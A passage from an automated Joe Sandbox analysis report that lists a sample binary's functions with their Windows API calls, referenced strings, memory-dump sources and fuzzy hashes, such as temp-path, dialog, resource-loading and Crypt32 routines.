Instruction Fuzzy Hash: C2413722540391D6CB31BF78D886EBFB3B8EF41714F24090EF9A1AB182EB505E81D395

Function 00CCCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00CCCE9D

Part of subcall function 00CBB690: _wcslen.LIBCMT ref: 00CBB696

_swprintf.LIBCMT ref: 00CCCED1

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

SetDlgItemTextW.USER32(?,00000066,00CF946A), ref: 00CCCEF1
EndDialog.USER32(?,00000001), ref: 00CCCFFE

Strings

%s%s%u, xrefs: 00CCCEC6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 54feb5897269bc542907652a23d975c24cc17613eca83d0bb899da4aa82eb60d
Instruction ID: db91296f08f0c21da84125ee16000c776f7fafc9a4f4985f2812dd167b1230e6
Opcode Fuzzy Hash: 54feb5897269bc542907652a23d975c24cc17613eca83d0bb899da4aa82eb60d
Instruction Fuzzy Hash: 854176B1900258A9DF25DB90CC85FEE77BCDB14340F4080AAF90AE7151EF709A45DF61

Function 00CBBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CBBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CBA275,?,?,00000800,?,00CBA23A,?,00CB755C), ref: 00CBBBC5
_wcslen.LIBCMT ref: 00CBBC3B

Strings

UNC, xrefs: 00CBBBA7
\\?\, xrefs: 00CBBB52, 00CBBB99, 00CBBBF7, 00CBBC4E

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: d6e4d3302a221015bfa039efd5752267c2e01fe36735788620615d7334a7a1ba
Instruction ID: e4e1f8fd559d9637a631568fb6cdae18cf5714d695ba0236c306f2b0efb69466
Opcode Fuzzy Hash: d6e4d3302a221015bfa039efd5752267c2e01fe36735788620615d7334a7a1ba
Instruction Fuzzy Hash: 4841E331440255B7CF21EF21CC01EEE7BA8AF45391F10446AF965A3151EBF0EE90DB60

Function 00CCB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00CCB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00CCB712
DeleteObject.GDI32(00000000), ref: 00CCB744
DeleteObject.GDI32(00000000), ref: 00CCB767

Part of subcall function 00CCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6D5
Part of subcall function 00CCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6EC
Part of subcall function 00CCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA703
Part of subcall function 00CCA6C2: LockResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA712
Part of subcall function 00CCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CCB73D,00000066), ref: 00CCA72D
Part of subcall function 00CCA6C2: GlobalLock.KERNEL32(00000000), ref: 00CCA73E
Part of subcall function 00CCA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CCA762
Part of subcall function 00CCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CCA7A7
Part of subcall function 00CCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CCA7C6
Part of subcall function 00CCA6C2: GlobalFree.KERNEL32(00000000), ref: 00CCA7CD

Strings

], xrefs: 00CCB71A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 4104b46a10aff17171dbb1937de64fe40274e4dd599dac10c3b2677c99727404
Instruction ID: 23eace55e21aaa98af14f5e3b13b7da38433ea1c9d19933c3160c9c28c65519c
Opcode Fuzzy Hash: 4104b46a10aff17171dbb1937de64fe40274e4dd599dac10c3b2677c99727404
Instruction Fuzzy Hash: A701AD36900609B7C7126BB4DC0EFAF7AB99BC4B5AF090019FD10A7291DF218E0656B2

Function 00CCD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

EndDialog.USER32(?,00000001), ref: 00CCD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CCD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00CCD675
SetDlgItemTextW.USER32(?,00000068), ref: 00CCD684

Strings

RENAMEDLG, xrefs: 00CCD618

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: dca8f9d97654272007e82a061b734c2678626385b0fe77f97105d30e3bb853f7
Instruction ID: a67ac1858e573fa46b439ab1add9a4f5f9244f8516a86f78708921338c14a209
Opcode Fuzzy Hash: dca8f9d97654272007e82a061b734c2678626385b0fe77f97105d30e3bb853f7
Instruction Fuzzy Hash: 8D012D33244314BAD2208F65DD49F9777ACEB5A702F114828F306E21D5C7A19A15C779

Function 00CD7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CD7E24,?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002), ref: 00CD7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CD7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00CD7E24,?,?,00CD7DC4,?,00CEC300,0000000C,00CD7F1B,?,00000002,00000000), ref: 00CD7EC9

Strings

CorExitProcess, xrefs: 00CD7E9E
mscoree.dll, xrefs: 00CD7E8C

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1d7346cdb5bf5a57d54879a98af88bffbc9fd1a805a10f730be676b38599cae
Instruction ID: 2002c87fe997fad7d61486c5cbff18de43a77c804b4ae85a9c4561dc96e4e5b8
Opcode Fuzzy Hash: f1d7346cdb5bf5a57d54879a98af88bffbc9fd1a805a10f730be676b38599cae
Instruction Fuzzy Hash: 59F04F31A00258BFDB119BA1DC4DBAEBFB5EB44755F0041A9F905AB2A0DB30AF40CA90

Function 00CBF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CC0836
Part of subcall function 00CC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CBF2D8,Crypt32.dll,00000000,00CBF35C,?,?,00CBF33E,?,?,?), ref: 00CC0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CBF2E4
GetProcAddress.KERNEL32(00CF81C8,CryptUnprotectMemory), ref: 00CBF2F4

Strings

CryptProtectMemory, xrefs: 00CBF2DE
CryptUnprotectMemory, xrefs: 00CBF2EA
Crypt32.dll, xrefs: 00CBF2CE

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 4cb4760df2b59ca3f625082d0240bf51108a83a190b6cac51495ba3e319ca60a
Instruction ID: 7f692bb9ac4d7451740c99b252e9cb634e01cd04790a9c4f6a8349f8795ddac8
Opcode Fuzzy Hash: 4cb4760df2b59ca3f625082d0240bf51108a83a190b6cac51495ba3e319ca60a
Instruction Fuzzy Hash: 21E04F709107C19EDB209B75984DB457AD46F04700F14887DE0DA93650D6B4E6819B50

Function 00CD2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00CD2CA1
___AdjustPointer.LIBCMT ref: 00CD2CC4
_abort.LIBCMT ref: 00CD2D12
___AdjustPointer.LIBCMT ref: 00CD2D60

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 968b81a46b9748b876eca101c81f801b2dc932c94cfd7fce07c06cc76ebb42ba
Instruction ID: ab56693f2b163f93fdf539d3092edbea44cf2d19c242417bb0f663a790938e54
Opcode Fuzzy Hash: 968b81a46b9748b876eca101c81f801b2dc932c94cfd7fce07c06cc76ebb42ba
Instruction Fuzzy Hash: 66510771600212AFEB298F14D945BBAB3A5FFA4310F24412FEE11473A1D732EE41E790

Function 00CDBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00CDBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDBF5C

Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CDBF82
_free.LIBCMT ref: 00CDBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDBFA4

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 90f94f2790ff2e590d2c78ddbb33e283cd230210b7df1029fe403996d20f6a61
Instruction ID: fd8025caa2aad35e79d3755497eb072cb55bb15dbd6361ad8f687ed1fd87350e
Opcode Fuzzy Hash: 90f94f2790ff2e590d2c78ddbb33e283cd230210b7df1029fe403996d20f6a61
Instruction Fuzzy Hash: 2201B16A601251BF272117BB5C8DD7F6A6DDEC6BA0316012EFA04C7340EF608E0195B0

Function 00CD9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00CD91AD,00CDB188,?,00CD9813,00000001,00000364,?,00CD40EF,?,?,00CF1098), ref: 00CD986E
_free.LIBCMT ref: 00CD98A3
_free.LIBCMT ref: 00CD98CA
SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD98D7
SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD98E0

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9064942ad1ea3bac88c487aa0fc67ec5a17fc46fa444a1bc2a193f34e72dd3f3
Instruction ID: 60547f88407d7c286d977c96a5d0e831fe46cc5e2b222af3a57b1bb775d5e47c
Opcode Fuzzy Hash: 9064942ad1ea3bac88c487aa0fc67ec5a17fc46fa444a1bc2a193f34e72dd3f3
Instruction Fuzzy Hash: 1C01D13A2447416BC3122625ACC9B2E266ADBD2B70F210137F725963E2EE358E05B621

Function 00CC0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00CC11CF: ResetEvent.KERNEL32(?), ref: 00CC11E1
Part of subcall function 00CC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CC11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CC0F21
CloseHandle.KERNEL32(?,?), ref: 00CC0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00CC0F54
CloseHandle.KERNEL32(?), ref: 00CC0F60
CloseHandle.KERNEL32(?), ref: 00CC0F6C

Part of subcall function 00CC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CC1101,?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FEA
Part of subcall function 00CC0FE4: GetLastError.KERNEL32(?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FF6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: a75e2dd62344080db81ea8b35f2419b35ec5ad4a931ff9d23445c58b0103dd51
Instruction ID: 2ab979e83fb9f3bd354b32865300f3db6076beaba40b2ff39a85a321811294f9
Opcode Fuzzy Hash: a75e2dd62344080db81ea8b35f2419b35ec5ad4a931ff9d23445c58b0103dd51
Instruction Fuzzy Hash: FA015E72500784EFC7229BA5DC88FDABBA9FB08710F10096DF26B92160CB757A45DA54

Function 00CDC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CDC817

Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4

_free.LIBCMT ref: 00CDC829
_free.LIBCMT ref: 00CDC83B
_free.LIBCMT ref: 00CDC84D
_free.LIBCMT ref: 00CDC85F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 08b56384e07bf9043e7adb9daaac1e20ca79e8393e8ac01ab6bf087c336b326b
Instruction ID: f64da68d9e4b14b18ad5a3518108c8b296d8e2301dadb8d2a4ba3cef8fc86016
Opcode Fuzzy Hash: 08b56384e07bf9043e7adb9daaac1e20ca79e8393e8ac01ab6bf087c336b326b
Instruction Fuzzy Hash: 8CF01232504252BB8720DB68E8C5E1B73EAAA447547541C1BF318DB7D2CB70FD80DA54

Function 00CC1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CC1FE5
_wcslen.LIBCMT ref: 00CC1FF6
_wcslen.LIBCMT ref: 00CC2006
_wcslen.LIBCMT ref: 00CC2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CBB371,?,?,00000000,?,?,?), ref: 00CC202F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 284ba25a1484f5042349f04b9243cf0b072dc6a036ca4ad64834bd50292673d6
Instruction ID: 3de5173546ccf3495f35fc71a8b0d202c7c7abf9adb17629439e54da55e9c8b4
Opcode Fuzzy Hash: 284ba25a1484f5042349f04b9243cf0b072dc6a036ca4ad64834bd50292673d6
Instruction Fuzzy Hash: 66F01D32008054BBCF225F51EC49E8E7F26EB44760B11841BF61A5B5A2CB729662E691

Function 00CD8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD891E

Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4

_free.LIBCMT ref: 00CD8930
_free.LIBCMT ref: 00CD8943
_free.LIBCMT ref: 00CD8954
_free.LIBCMT ref: 00CD8965

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d86452d6e12b9c96b0cb1a1d29bde8644009ac17cdcd80ff00dc7e22dfd9a7c4
Instruction ID: 6b4c85d36172ae6b77a151e13e6909d4790d0fad96b36db4fdea384609fc2325
Opcode Fuzzy Hash: d86452d6e12b9c96b0cb1a1d29bde8644009ac17cdcd80ff00dc7e22dfd9a7c4
Instruction Fuzzy Hash: 0EF06770800326BB86026F24FC025AE3BA2F728720300410AF254863F5CF334966ABA4

Function 00CC15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CC17BC
_swprintf.LIBCMT ref: 00CC186B

Strings

%s: %s, xrefs: 00CC17CB
%ls, xrefs: 00CC1641, 00CC1657

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 83491f98746cd41e5e91289c075aa17a887827be67e7ce19d2c6aa2311715fb9
Instruction ID: 18b21014eb2a5dc436a528c1d3db54adea3e49f15946920719484581bb76dde7
Opcode Fuzzy Hash: 83491f98746cd41e5e91289c075aa17a887827be67e7ce19d2c6aa2311715fb9
Instruction Fuzzy Hash: 3751063528C304FAE6261AA3CD46F757265EB07F04F2C450EFF96644E3C9A2A910B75B

Function 00CD31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CD31FB
_abort.LIBCMT ref: 00CD3306

Strings

RCC, xrefs: 00CD3215
MOC, xrefs: 00CD320D

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
